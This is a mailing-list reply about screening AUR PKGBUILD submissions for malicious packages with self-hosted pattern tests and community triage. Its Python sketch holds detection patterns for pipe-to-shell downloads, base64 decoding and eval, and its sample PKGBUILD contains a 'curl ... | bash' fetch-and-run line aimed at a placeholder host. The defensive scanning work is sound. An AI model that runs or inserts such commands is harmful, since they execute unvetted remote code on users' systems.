Re: [Idea] AUR vetting process using LLM models

David C Rankin Sat, 30 May 2026 00:15:56 -0700

On 5/29/26 2:56 AM, [email protected] wrote:

Pretty good idea you got there, however there's a legitimate concern on where and how you are going to be running it.
For instance, which model to use? Gemini? Deepseek? Open-sourced ChatGPT?
Secondly, where are we gonna get the money for that? Donations are enough for everything up to this point, but running an LLM will shoot costs through the roof. I suggest either distilling or training a separate algorithm (**NOT** a language model) to keep costs low, as it won't be a generalist and we won't be wasting RAM on storing parameters about medicine in a software project.

That's a really good idea, and those are practical concerns. But since PKGBUILD files are just bash scripts, and we could probably suss out a fairly rigorous scan process given the brain trust on this list, it may not require a frontier-model LLM or its cost.

Why not come up with a set of criteria and turn those into sed, awk, etc. tests to capture suspicious submissions? Those tests could simply be self-hosted and run for each new account/submission. All an LLM is going to do is take prompts that tell it to go put those things together and then run them (give or take). Some prompt wizard could go see what the models spit out when told to generate an efficient set of scripts to test the criteria, and see how well those scripts work.
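For illustration, here is a minimal sketch of what criteria-as-tests could look like. It is written in Python rather than sed/awk purely to keep the example self-contained. The three patterns and the names `RULES`, `SAMPLE`, and `scan_pkgbuild` are made-up placeholders, not an agreed criteria list:

```python
import re

# Hypothetical example criteria. A real list would come out of the
# postmortems and discussion on the list, not from this sketch.
RULES = {
    # Download piped straight into a shell, e.g. "curl ... | bash"
    "pipe-to-shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    # Decoding an embedded base64 blob
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    # eval applied to a command substitution
    "eval-of-substitution": re.compile(r"\beval\s+[\"']?(\$\(|`)"),
}


def scan_pkgbuild(text):
    """Return (line_number, rule_name, line) for each line matching a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # skip full-line comments
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append((lineno, name, stripped))
    return findings


# Made-up PKGBUILD fragment; example.invalid is a placeholder host.
SAMPLE = """\
pkgname=example
# curl https://example.invalid/x | sh   (comment, ignored)
build() {
  make
}
package() {
  curl -s https://example.invalid/install.sh | bash
}
"""

if __name__ == "__main__":
    for finding in scan_pkgbuild(SAMPLE):
        print(finding)
```

Each finding is a (line number, rule name, line) tuple that could be handed to whoever triages the positives. Plain pattern matching on bash is easy to evade with obfuscation, so this only shows the shape of the approach, not a complete scanner.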

A self-hosted tool that is 95% as good as an LLM with zero cost, that scales, seems like the best of both worlds.

The second part of that is moderator or trusted-user triage of any positives identified. That has to scale as well (hopefully not too much), but we don't want to take the moderators away from the job they do otherwise. Putting that out to the community in a Stack Overflow "Queues"-type format may be an option to get member involvement, and that could be opened to users with X number of years/months on their account without a lot of trouble.

I don't mind helping from either a queue or a tool standpoint, but what we need to do is start gathering together the criteria that need to be checked, etc., starting with the postmortem from the recent attempts. I don't know how they would be integrated to run at the AUR level, but I can turn criteria into testable script fragments to help.

Something similar could be done for AUR account/package ownership changes, adoptions, etc.

Focusing on the actual package problem and eliminating the account-identity baggage is a good idea, and a homegrown solution is never a bad choice.



--
David C. Rankin, J.D.,P.E.
